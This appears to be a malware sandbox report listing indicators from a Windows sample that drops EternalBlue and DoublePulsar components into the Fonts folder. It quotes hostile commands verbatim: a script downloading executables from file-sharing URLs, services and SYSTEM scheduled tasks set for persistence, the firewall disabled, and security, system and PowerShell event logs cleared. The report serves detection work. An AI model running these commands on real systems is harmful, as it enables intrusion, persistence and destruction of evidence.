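Technical Information

The entries below are behavioural indicators (registry values, command lines, file paths, network requests) listed without category headings, so a path that appears more than once presumably belongs to different action categories. `<SYSTEM32>`, `<Current directory>`, `%WINDIR%`, `%TEMP%` and `%PROGRAMDATA%` are path placeholders, and the `#` characters in the URLs and host name appear to mask part of the original value. Points most relevant for detection: auto-start services ('Start' = '00000002') whose ImagePath is under %WINDIR%\Fonts, the daily scheduled tasks "At1" and "At2" created to run as SYSTEM, and the wevtutil calls that clear the "windows powershell", "system" and "security" event logs.
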
- [<HKLM>\System\CurrentControlSet\Services\MicrosotMaims] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\MicrosotMaims] 'ImagePath' = '%WINDIR%\Fonts\svchost.exe'
- [<HKLM>\System\CurrentControlSet\Services\MicrosoftMysql] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\MicrosoftMysql] 'ImagePath' = '%WINDIR%\Fonts\Mysql\svchost.exe'
- '<SYSTEM32>\taskkill.exe' /F /im sqlserver.exe
- '<SYSTEM32>\net.exe' stop NetPipAtcivator
- '<SYSTEM32>\net.exe' stop WetPipAtcivator
- '<SYSTEM32>\net.exe' stop SetPipAtcivator
- '<SYSTEM32>\net.exe' stop MetPipAtcivator
- '%WINDIR%\syswow64\net.exe' stop MicrosotMaims
- '<SYSTEM32>\net.exe' stop EvemsWindows
- '<SYSTEM32>\net.exe' stop Evemsarver
- '%WINDIR%\syswow64\net.exe' stop MicrosotMais
- '%WINDIR%\syswow64\net.exe' stop mssecsvc2.1
- '%WINDIR%\syswow64\net.exe' stop "MicrosoftMysql"
- '%WINDIR%\syswow64\net.exe' stop "MicrosoftMssql"
- '%WINDIR%\syswow64\net.exe' stop SharedAccess
- '%WINDIR%\syswow64\taskkill.exe' /f /im mance.exe
- '%WINDIR%\syswow64\net.exe' stop lanmanserver /y
- '%WINDIR%\syswow64\net.exe' stop mssecsvc2.0
- '<SYSTEM32>\net.exe' stop Samsorver
- '<SYSTEM32>\taskkill.exe' /f /t /im dl1hots.exe
- '<SYSTEM32>\taskkill.exe' /f /t /im d1lhots.exe
- '<SYSTEM32>\taskkill.exe' /F /im sqlservr.exe
- '<SYSTEM32>\taskkill.exe' /F /im WUDFhosts.exe
- '<SYSTEM32>\taskkill.exe' /F /im TrustedInsteller.exe
- '<SYSTEM32>\taskkill.exe' /f /t /im sqlserver.exe
- '<SYSTEM32>\taskkill.exe' /f /t /im FTP.exe
- '<SYSTEM32>\taskkill.exe' /f /t /im powershell.exe
- '<SYSTEM32>\taskkill.exe' /F /im powershell.exe
- '<SYSTEM32>\taskkill.exe' /f /t /im wscript.exe
- '<SYSTEM32>\taskkill.exe' /f /t /im rundlls.exe
- '<SYSTEM32>\taskkill.exe' /f /t /im dlllhost.exe
- '<SYSTEM32>\taskkill.exe' /f /t /im KvMonXP.exe
- '<SYSTEM32>\taskkill.exe' /f /t /im dllhots.exe
- '<SYSTEM32>\taskkill.exe' /f /t /im d11hots.exe
- '<SYSTEM32>\taskkill.exe' /f /t /im dlIhost.exe
- '<SYSTEM32>\taskkill.exe' /f /t /im rundllhost.exe
- '%WINDIR%\syswow64\taskkill.exe' /f /im Eter.exe
- '%WINDIR%\syswow64\taskkill.exe' /f /im puls.exe
- %TEMP%\9358.tmp\kk.bat
- %WINDIR%\fonts\mysql\loab.bat
- %WINDIR%\fonts\mysql\load.bat
- %WINDIR%\fonts\mysql\mance.exe
- %WINDIR%\fonts\mysql\mance.xml
- %WINDIR%\fonts\mysql\nanshou.dll
- %WINDIR%\fonts\mysql\p.txt
- %WINDIR%\fonts\mysql\poab.bat
- %WINDIR%\fonts\mysql\poad.bat
- %WINDIR%\fonts\mysql\posh-0.dll
- %WINDIR%\fonts\mysql\puls.exe
- %WINDIR%\fonts\mysql\puls.xml
- %WINDIR%\fonts\mysql\ssleay32.dll
- %WINDIR%\fonts\mysql\svchost.exe
- %WINDIR%\fonts\mysql\taskhost.exe
- %WINDIR%\fonts\mysql\tibe-2.dll
- %WINDIR%\fonts\mysql\tich-1.dll
- %WINDIR%\fonts\mysql\trch-1.dll
- %WINDIR%\fonts\mysql\trfo-2.dll
- %WINDIR%\fonts\mysql\tucl-1.dll
- %WINDIR%\fonts\mysql\tufo-2.dll
- %WINDIR%\fonts\mysql\ucl.dll
- %WINDIR%\fonts\mysql\wget.exe
- %WINDIR%\fonts\mysql\xdvl-0.dll
- %WINDIR%\fonts\mysql\libxml2.dll
- %WINDIR%\fonts\mysql\zlib1.dll
- %WINDIR%\fonts\mysql\libeay32.dll
- %WINDIR%\fonts\mysql\eter.xml
- <Current directory>\xxoo.vbs
- %WINDIR%\inf\50.exe
- %WINDIR%\fonts\svchost.exe
- %WINDIR%\fonts\conhost.exe
- %WINDIR%\inf\tem.vbs
- %WINDIR%\inf\445.exe
- %TEMP%\xsfxdel~.exe
- %WINDIR%\fonts\mysql\ctfmon.exe
- %WINDIR%\fonts\mysql\doublepulsar.dll
- %WINDIR%\fonts\mysql\doublepulsar2.dll
- %WINDIR%\fonts\mysql\eternalblue.dll
- %WINDIR%\fonts\mysql\eternalblue2.dll
- %WINDIR%\fonts\mysql\file.txt
- %WINDIR%\fonts\mysql\nei.bat
- %WINDIR%\fonts\mysql\wai.bat
- %WINDIR%\fonts\mysql\same.bat
- %WINDIR%\fonts\mysql\bat.bat
- %WINDIR%\fonts\mysql\cmd.bat
- %WINDIR%\fonts\mysql\cnli-1.dll
- %WINDIR%\fonts\mysql\coli-0.dll
- %WINDIR%\fonts\mysql\crli-0.dll
- %WINDIR%\fonts\mysql\dmgd-4.dll
- %WINDIR%\fonts\mysql\eter.exe
- %WINDIR%\fonts\mysql\exma-1.dll
- nul
- %WINDIR%\fonts\conhost.exe
- %WINDIR%\fonts\svchost.exe
- %WINDIR%\inf\tem.vbs
- %WINDIR%\fonts\mysql\ctfmon.exe
- %WINDIR%\fonts\mysql\doublepulsar.dll
- %WINDIR%\fonts\mysql\doublepulsar2.dll
- %WINDIR%\fonts\mysql\eternalblue.dll
- %WINDIR%\fonts\mysql\eternalblue2.dll
- %WINDIR%\fonts\mysql\file.txt
- <Current directory>\xxoo.vbs
- %WINDIR%\inf\50.exe
- %WINDIR%\inf\tem.vbs
- %WINDIR%\fonts\mysql\file.txt
- %WINDIR%\fonts\mysql\doublepulsar.dll
- %WINDIR%\fonts\mysql\doublepulsar2.dll
- %WINDIR%\fonts\mysql\eternalblue.dll
- %WINDIR%\fonts\mysql\eternalblue2.dll
- %WINDIR%\inf\445.exe
- <Current directory>\xxoo.vbs
- http://no##.youdao.com/yws/api/personal/file/WEBb7c8f451dbb9385d84828b45f97fd7ae?me###################################################################
- http://no##.youdao.com/yws/api/personal/file/WEB307a0cc7e244dab376576c72912aa7d4?me###################################################################
- DNS ASK no##.youdao.com
- ClassName: '' WindowName: ''
- '%WINDIR%\fonts\mysql\svchost.exe'
- '%WINDIR%\fonts\mysql\svchost.exe' start "MicrosoftMysql"
- '%WINDIR%\fonts\svchost.exe' set MicrosotMaims DisplayName Network Location Service
- '%WINDIR%\fonts\svchost.exe' start MicrosotMaims
- '%WINDIR%\fonts\svchost.exe' install MicrosotMaims %WINDIR%\Fonts\conhost.exe
- '%WINDIR%\inf\445.exe'
- '%WINDIR%\fonts\mysql\ctfmon.exe'
- '%WINDIR%\fonts\mysql\svchost.exe' install MicrosoftMysql "%WINDIR%\Fonts\Mysql\cmd.bat"
- '%WINDIR%\syswow64\wscript.exe' "%WINDIR%\inf\tem.vbs"
- '%WINDIR%\fonts\mysql\svchost.exe' stop "MicrosoftFonts"
- '%WINDIR%\fonts\mysql\svchost.exe' stop "MicrosoftMysql"
- '%WINDIR%\fonts\mysql\svchost.exe' install MicrosoftMysql %WINDIR%\Fonts\Mysql\cmd.bat
- '%WINDIR%\fonts\mysql\svchost.exe' install "MicrosoftMysql" %WINDIR%\Fonts\Mysql\cmd.bat
- '%WINDIR%\inf\50.exe'
- '%TEMP%\xsfxdel~.exe' "%WINDIR%\inf\445.exe"
- '%WINDIR%\fonts\svchost.exe' set MicrosotMaims Description Provides performance library information from Windows Management.
- '%WINDIR%\syswow64\net.exe' stop mssecsvc2.1' (with hidden window)
- '%TEMP%\xsfxdel~.exe' "%WINDIR%\inf\445.exe"' (with hidden window)
- '%WINDIR%\fonts\svchost.exe' set MicrosotMaims Description Provides performance library information from Windows Management.' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c ""%WINDIR%\Fonts\Mysql\same.bat" "' (with hidden window)
- '%WINDIR%\fonts\svchost.exe' set MicrosotMaims DisplayName Network Location Service' (with hidden window)
- '%WINDIR%\fonts\svchost.exe' install MicrosotMaims %WINDIR%\Fonts\conhost.exe' (with hidden window)
- '%WINDIR%\syswow64\sc.exe' delete mssecsvc2.1' (with hidden window)
- '%WINDIR%\syswow64\sc.exe' delete mssecsvc2.0' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c attrib -s -h -r -a %WINDIR%\Fonts' (with hidden window)
- '%WINDIR%\syswow64\sc.exe' delete lanmanserver' (with hidden window)
- '%WINDIR%\syswow64\net.exe' stop lanmanserver /y' (with hidden window)
- '%WINDIR%\syswow64\sc.exe' delete MicrosotMais' (with hidden window)
- '%WINDIR%\syswow64\net.exe' stop MicrosotMais' (with hidden window)
- '%WINDIR%\syswow64\sc.exe' delete MicrosotMaims' (with hidden window)
- '%WINDIR%\syswow64\net.exe' stop MicrosotMaims' (with hidden window)
- '%WINDIR%\syswow64\net.exe' stop mssecsvc2.0' (with hidden window)
- '%WINDIR%\syswow64\sc.exe' config lanmanserver start= DISABLED 2>nul' (with hidden window)
- '%WINDIR%\fonts\svchost.exe' start MicrosotMaims' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\9358.tmp\KK.bat" "' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\9358.tmp\KK.bat" "
- '<SYSTEM32>\sc.exe' delete WetPipAtcivator
- '<SYSTEM32>\net1.exe' stop SetPipAtcivator
- '<SYSTEM32>\sc.exe' delete SetPipAtcivator
- '<SYSTEM32>\net1.exe' stop MetPipAtcivator
- '<SYSTEM32>\sc.exe' delete MetPipAtcivator
- '<SYSTEM32>\net1.exe' stop NetPipAtcivator
- '<SYSTEM32>\cscript.exe' xxoo.vbs "http://no##.youdao.com/yws/api/personal/file/WEBb7c8f451dbb9385d84828b45f97fd7ae?me###################################################################" %WINDIR%\inf\50.exe
- '<SYSTEM32>\net1.exe' stop WetPipAtcivator
- '%WINDIR%\syswow64\sc.exe' delete MicrosotMaims
- '%WINDIR%\syswow64\sc.exe' config lanmanserver start= DISABLED 2>nul
- '%WINDIR%\syswow64\sc.exe' delete lanmanserver
- '%WINDIR%\syswow64\sc.exe' delete mssecsvc2.0
- '%WINDIR%\syswow64\sc.exe' delete mssecsvc2.1
- '%WINDIR%\syswow64\attrib.exe' -s -h -r -a %WINDIR%\Fonts
- '%WINDIR%\syswow64\cmd.exe' /c attrib -s -h -r -a %WINDIR%\Fonts
- '%WINDIR%\syswow64\net1.exe' stop MicrosotMais
- '%WINDIR%\syswow64\sc.exe' delete MicrosotMais
- '<SYSTEM32>\sc.exe' delete NetPipAtcivator
- '<SYSTEM32>\sc.exe' delete Evemsarver
- '<SYSTEM32>\net1.exe' stop Evemsarver
- '<SYSTEM32>\sc.exe' stop ServiceMais
- '<SYSTEM32>\sc.exe' delete ServiceMais
- '<SYSTEM32>\sc.exe' stop ServiceMaims
- '<SYSTEM32>\sc.exe' delete ServiceMaims
- '<SYSTEM32>\sc.exe' stop NetPipeAtcivator
- '<SYSTEM32>\sc.exe' delete NetPipeAtcivator
- '<SYSTEM32>\sc.exe' stop ServiceSais
- '<SYSTEM32>\sc.exe' stop FormManger
- '<SYSTEM32>\sc.exe' stop Famserver
- '<SYSTEM32>\sc.exe' delete Famserver
- '<SYSTEM32>\sc.exe' stop Microsarver
- '<SYSTEM32>\sc.exe' delete Microsarver
- '<SYSTEM32>\net1.exe' stop Samsorver
- '<SYSTEM32>\sc.exe' delete Samsorver
- '<SYSTEM32>\net1.exe' stop EvemsWindows
- '<SYSTEM32>\sc.exe' delete FormManger
- '<SYSTEM32>\sc.exe' delete EvemsWindows
- '<SYSTEM32>\sc.exe' delete ServiceSaims
- '<SYSTEM32>\sc.exe' delete ServiceSais
- '%WINDIR%\syswow64\net1.exe' stop mssecsvc2.0
- '<SYSTEM32>\cscript.exe' xxoo.vbs "http://no##.youdao.com/yws/api/personal/file/WEB307a0cc7e244dab376576c72912aa7d4?me###################################################################" %WINDIR%\inf\445.exe
- '%WINDIR%\syswow64\net1.exe' stop SharedAccess
- '%WINDIR%\syswow64\cmd.exe' /S /D /c" echo y"
- '%WINDIR%\syswow64\schtasks.exe' /create /TN "At1" /TR "%WINDIR%\Fonts\Mysql\nei.bat" /SC daily /ST 11:30:00 /RU SYSTEM
- '%WINDIR%\syswow64\schtasks.exe' /create /TN "At2" /TR "%WINDIR%\Fonts\Mysql\wai.bat" /SC daily /ST 01:00:00 /RU SYSTEM
- '%WINDIR%\syswow64\attrib.exe' +h +s -r %WINDIR%\tasks\At*.job
- '%WINDIR%\syswow64\attrib.exe' +h +s -r <SYSTEM32>\Tasks\At*
- '%WINDIR%\syswow64\net.exe' start "MicrosoftMysql"
- '%WINDIR%\syswow64\net1.exe' start "MicrosoftMysql"
- '%WINDIR%\syswow64\cacls.exe' %WINDIR%\tasks\At1.job /c /e /t /g system:F
- '%WINDIR%\syswow64\cacls.exe' %WINDIR%\tasks\At2.job /c /e /t /g everyone:F
- '%WINDIR%\syswow64\cacls.exe' <SYSTEM32>\Tasks\At1 /c /e /t /g system:F
- '%WINDIR%\syswow64\cacls.exe' <SYSTEM32>\Tasks\At2 /c /e /t /g system:F
- '%WINDIR%\syswow64\cacls.exe' <SYSTEM32>\Tasks\At1 /c /e /t /g everyone:F
- '%WINDIR%\syswow64\cacls.exe' <SYSTEM32>\Tasks\At2 /c /e /t /g everyone:F
- '%WINDIR%\syswow64\cacls.exe' %WINDIR%\Tasks\MiscfostNsi /p system:n
- '%WINDIR%\syswow64\cacls.exe' %WINDIR%\tasks\At2.job /c /e /t /g system:F
- '%WINDIR%\syswow64\cacls.exe' %WINDIR%\tasks\At1.job /c /e /t /g everyone:F
- '%WINDIR%\syswow64\net1.exe' start lanmanserver
- '%WINDIR%\syswow64\net1.exe' start lanmanworkstation
- '<SYSTEM32>\attrib.exe' -s -h -r %WINDIR%\Fonts\dlllhost.exe
- '%WINDIR%\syswow64\cmd.exe' /c ""%WINDIR%\Fonts\Mysql\same.bat" "
- '%WINDIR%\syswow64\net1.exe' stop "MicrosoftMysql"
- '%WINDIR%\syswow64\net1.exe' stop "MicrosoftMssql"
- '%WINDIR%\syswow64\sc.exe' delete "MicrosoftMysql"
- '%WINDIR%\syswow64\sc.exe' delete "MicrosoftMssql"
- '%WINDIR%\syswow64\ping.exe' 127.0.0.1 -n 20
- '%WINDIR%\syswow64\cmd.exe' /c ""%WINDIR%\Fonts\Mysql\cmd.bat" "
- '%WINDIR%\syswow64\mode.com' con cols=50 lines=40
- '%WINDIR%\syswow64\sc.exe' config Browser start= auto
- '%WINDIR%\syswow64\sc.exe' config lanmanworkstation start= auto
- '%WINDIR%\syswow64\sc.exe' config lanmanserver start= auto
- '%WINDIR%\syswow64\sc.exe' config SharedAccess start= disabled
- '%WINDIR%\syswow64\net.exe' start Browser
- '%WINDIR%\syswow64\net1.exe' start Browser
- '%WINDIR%\syswow64\net.exe' start lanmanworkstation
- '%WINDIR%\syswow64\net1.exe' stop mssecsvc2.1
- '%WINDIR%\syswow64\net1.exe' stop lanmanserver /y
- '%WINDIR%\syswow64\net1.exe' stop MicrosotMaims
- '<SYSTEM32>\sc.exe' stop ServiceSaims
- '<SYSTEM32>\sc.exe' delete MicrosotSaims
- '<SYSTEM32>\sc.exe' stop MicrosotSaims
- '<SYSTEM32>\sc.exe' stop SQLWriter$
- '<SYSTEM32>\sc.exe' delete SQLWriter$
- '<SYSTEM32>\sc.exe' stop Java_update
- '<SYSTEM32>\sc.exe' delete Java_update
- '<SYSTEM32>\sc.exe' stop Microsoftmyssql
- '<SYSTEM32>\sc.exe' delete TlntSvr
- '<SYSTEM32>\sc.exe' delete Microsoftmyssql
- '<SYSTEM32>\sc.exe' delete cftmon
- '<SYSTEM32>\sc.exe' delete KuGouMusic
- '<SYSTEM32>\sc.exe' delete WinHelpSvcs
- '<SYSTEM32>\sc.exe' stop Networks
- '<SYSTEM32>\sc.exe' delete Networks
- '<SYSTEM32>\sc.exe' stop MicrosoftWServertime
- '<SYSTEM32>\sc.exe' delete MicrosoftWServertime
- '<SYSTEM32>\sc.exe' stop KuGouMusic
- '<SYSTEM32>\sc.exe' stop TlntSvr
- '<SYSTEM32>\sc.exe' stop WinHelpSvcs
- '<SYSTEM32>\sc.exe' delete WiredService
- '<SYSTEM32>\sc.exe' stop WiredService
- '<SYSTEM32>\wevtutil.exe' cl "windows powershell"
- '<SYSTEM32>\wevtutil.exe' cl "system"
- '<SYSTEM32>\cmd.exe' /S /D /c" echo y"
- '<SYSTEM32>\cacls.exe' %WINDIR%\Fonts\Debug\sqlserver.exe /d everyone
- '<SYSTEM32>\cacls.exe' %WINDIR%\Fonts\Debug /d everyone
- '<SYSTEM32>\cacls.exe' %WINDIR%\Cursors /d everyone
- '<SYSTEM32>\cacls.exe' %PROGRAMDATA%\Microsoft\svchost.exe /d everyone
- '<SYSTEM32>\cacls.exe' %PROGRAMDATA% /d everyone
- '<SYSTEM32>\wevtutil.exe' cl "security"
- '<SYSTEM32>\cacls.exe' %WINDIR%\Fonts\mysql /p everyone:F
- '<SYSTEM32>\cacls.exe' %WINDIR%\Fonts\dl1hots.exe /p everyone:F
- '<SYSTEM32>\cacls.exe' %WINDIR%\conhost\conhost.exe /d everyone
- '<SYSTEM32>\sc.exe' stop sql
- '<SYSTEM32>\sc.exe' delete sql
- '<SYSTEM32>\sc.exe' stop Networks20181019
- '<SYSTEM32>\sc.exe' delete Networks20181019
- '<SYSTEM32>\sc.exe' stop MSSQLSERVER$
- '<SYSTEM32>\cacls.exe' %WINDIR%\Fonts\sqlservr.exe /d everyone
- '<SYSTEM32>\sc.exe' delete MSSQLSERVER$
- '<SYSTEM32>\sc.exe' stop cftmon
- '<SYSTEM32>\cacls.exe' %WINDIR%\Fonts\Debuger /d everyone
- '<SYSTEM32>\attrib.exe' -s -h -r %WINDIR%\Fonts\csrss.exe
- '<SYSTEM32>\cacls.exe' "%WINDIR%\Fonts\rundllhost.exe" /g everyone:f
- '<SYSTEM32>\cacls.exe' "%WINDIR%\Fonts\dlllhost.exe" /g everyone:f
- '<SYSTEM32>\cacls.exe' "%WINDIR%\Fonts\conhost.exe" /g everyone:f
- '<SYSTEM32>\cacls.exe' "%WINDIR%\Fonts\svchost.exe" /g everyone:f
- '<SYSTEM32>\cacls.exe' "%WINDIR%\Fonts\csrss.exe" /g everyone:f
- '<SYSTEM32>\wbem\wmic.exe' process where "name='csrss.exe' and ExecutablePath='C:\\Windows\\Fonts\\csrss.exe'" call Terminate
- '<SYSTEM32>\wbem\wmic.exe' process where "name='svchost.exe' and ExecutablePath='C:\\Windows\\Fonts\\svchost.exe'" call Terminate
- '<SYSTEM32>\wbem\wmic.exe' process where "name='conhost.exe' and ExecutablePath='C:\\Windows\\Fonts\\conhost.exe'" call Terminate
- '<SYSTEM32>\wbem\wmic.exe' process where "name='lsass.exe' and ExecutablePath='C:\\Windows\\Fonts\\lsass.exe'" call Terminate
- '<SYSTEM32>\sc.exe' stop MicrosotMais
- '<SYSTEM32>\sc.exe' delete MicrosotMais
- '<SYSTEM32>\sc.exe' stop MicrosotMaims
- '<SYSTEM32>\sc.exe' delete MicrosotMaims
- '<SYSTEM32>\sc.exe' stop MicrosotSais
- '<SYSTEM32>\sc.exe' delete MicrosotSais
- '<SYSTEM32>\attrib.exe' -s -h -r %WINDIR%\Fonts\svchost.exe
- '<SYSTEM32>\sc.exe' stop HostManger
- '<SYSTEM32>\cacls.exe' "%WINDIR%\Fonts\rundlls.exe" /g everyone:f
- '%WINDIR%\syswow64\net.exe' start lanmanserver
- '%WINDIR%\syswow64\cacls.exe' %WINDIR%\Tasks\HomeGroupProvider /p system:n
- '<SYSTEM32>\attrib.exe' -s -h -r %WINDIR%\Fonts\rundllhost.exe
- '<SYSTEM32>\sc.exe' stop SERVERTIMEl
- '<SYSTEM32>\sc.exe' delete SERVERTIMEl
- '<SYSTEM32>\sc.exe' stop SERVERTIME
- '<SYSTEM32>\sc.exe' delete SERVERTIME
- '<SYSTEM32>\sc.exe' stop Hostserver
- '<SYSTEM32>\sc.exe' delete Hostserver
- '<SYSTEM32>\sc.exe' stop ServicesMain
- '<SYSTEM32>\sc.exe' delete HostManger
- '<SYSTEM32>\sc.exe' delete ServicesMain
- '<SYSTEM32>\takeown.exe' /f %WINDIR%\Fonts\rundlls.exe /a
- '<SYSTEM32>\takeown.exe' /f %WINDIR%\Fonts\rundllhost.exe /a
- '<SYSTEM32>\takeown.exe' /f %WINDIR%\Fonts\dlllhost.exe /a
- '<SYSTEM32>\takeown.exe' /f %WINDIR%\Fonts\conhost.exe /a
- '<SYSTEM32>\takeown.exe' /f %WINDIR%\Fonts\svchost.exe /a
- '<SYSTEM32>\takeown.exe' /f %WINDIR%\Fonts\csrss.exe /a
- '<SYSTEM32>\attrib.exe' -s -h -r %WINDIR%\Fonts\rundlls.exe
- '<SYSTEM32>\takeown.exe' /f %WINDIR%\fonts /a
- '<SYSTEM32>\attrib.exe' -s -h -r %WINDIR%\Fonts\conhost.exe
- '%WINDIR%\syswow64\cacls.exe' %WINDIR%\Tasks\WwANsvc /p system:n